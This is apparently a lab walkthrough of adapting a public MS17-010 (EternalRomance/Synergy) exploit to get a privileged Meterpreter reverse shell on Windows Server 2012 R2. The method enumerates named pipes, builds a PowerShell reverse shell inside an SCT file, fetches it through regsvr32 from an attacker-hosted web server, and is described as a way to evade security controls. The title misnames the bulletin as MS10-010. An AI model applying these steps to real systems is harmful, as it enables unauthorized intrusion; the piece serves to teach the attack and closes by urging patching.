MS10-010 vulnerability patched by Microsoft affecting from windows 7 to a windows server 2016 (Eternalromance/synergy published by shadow brokers the exploits are very unstable if tried against the windows 2012, 2016 server causing 100% of the target machine BSOD
This is not a comprehensive article but we will demonstrate how we can leverage and make necessary changes to the Sleepys code and make minimal code change in order to obtain a privileged windows meterepreter reverse on the target system
Virtual Environment & prerequisites
Kali Ubuntu Machine IP address 192.168.1.14
Ps1Encode – Used to generate PowerShell metasploit types revershell
Windows Server 2012 R2 target IP 192.168.1.30 ( Not patched with MS17_010 )
Ok so without further ado let’s compromise windows 2012R2 server
The exploit has been published by sleepya https://www.exploit-db.com/exploits/42315/ the exploit is working properly without doing any modification if we execute the exploit against the windows 2012r2 server it will create a file in C:\pawned.txt on the target disk .
But you might already think hm but that doesn’t give me meterpreter shell on the target box , that’s very much true but we make couple of modification to get the desired shell
We now enabled guest account on our windows server R2 windows machine
Figure 1 we set the authentication to “guest” with minimal privilege
The exploit code requires two parameters the actual Target IP address windows server 2012R2 in our case and the PIPE name – windows named pipe is not in the scope of this article. SMB protocol supports three different types of shares File share which is a directory tree, Print: print share which is access to print shares on the server, PIPE inter communication between the process that uses FIFO model essentially first in first out a.k.a named pipes .
What other pipe types you can potentially exploits on a windows server box ?
- Netlogon, samr, lsarpc,spoolss,browser
Ok it’s very straightforward to identify which named pipe are available on a target server – I wrote a python scrip which compares the UID to identify if the named pipe exist is so then just check access if allowed or denied
Script identify named pipes on the target windows server 2012 R2
Figure 2 allows identify named pipe Browser, Spools, Netlogon, LSARPC, SAMR
If we decide to execute the exploit it will create c:\\namlook.txt on the target .
Figure 3 executed code without reverse shell created c:\namlook.txt
Code snippet creates namlook.txt on the target server
Figure 4 CreateFile function adds pwned.txt on the target server but no reverse shell code.
Executing code with our SCT reverse shell code ( SCT File Extension ) Windows script component
This is an affective approach to evade security controls using the SCT extension with embedded powershell reverse shell code. We wil l use PS1encode that allows us to generate encoded metasploit codes in different/several format
Exploit Modification/Reverse shell
Executing code with our SCT reverse shell code ( SCT File Extension ) Windows script component. This is an affective approach to evade security controls using the SCT extension with embedded powershell reverse shell code. We wil l use PS1encode that allows us to generate encoded metasploit codes in different/several format
We can download the ps1encode here from github https://github.com/CroweCybersecurity/ps1encode
SCT Reverse Shell code
Figure 5 reverse shell code windows/meterepreter/reverse_tcp
Armed with .SCT reverse shell file we simply move the to our python web server on kali machine /var/www/html or any machine that can be reach from the target server. The idea is that when we execute the exploit against the target server to use regsvr32 (Microsoft Register Server) command line utility for registering and DLLs in the windows registry
Reverse shell code
Figure 6 – We modified code to execute our malicious revershell code .SCT on our target machine
We now configrured the metasplot’s exploit/multi/handler to receive reverse shell
Figure 7 handler configured with windows/meterpreter/reverse_tcp
After executing modified MS17_010 exploit get clean meterpreter reverse shell
Figure 8 sysinfo with NT/Authority priv ….
Go and patch please … https://technet.microsoft.com/en-us/library/security/ms17-010.aspx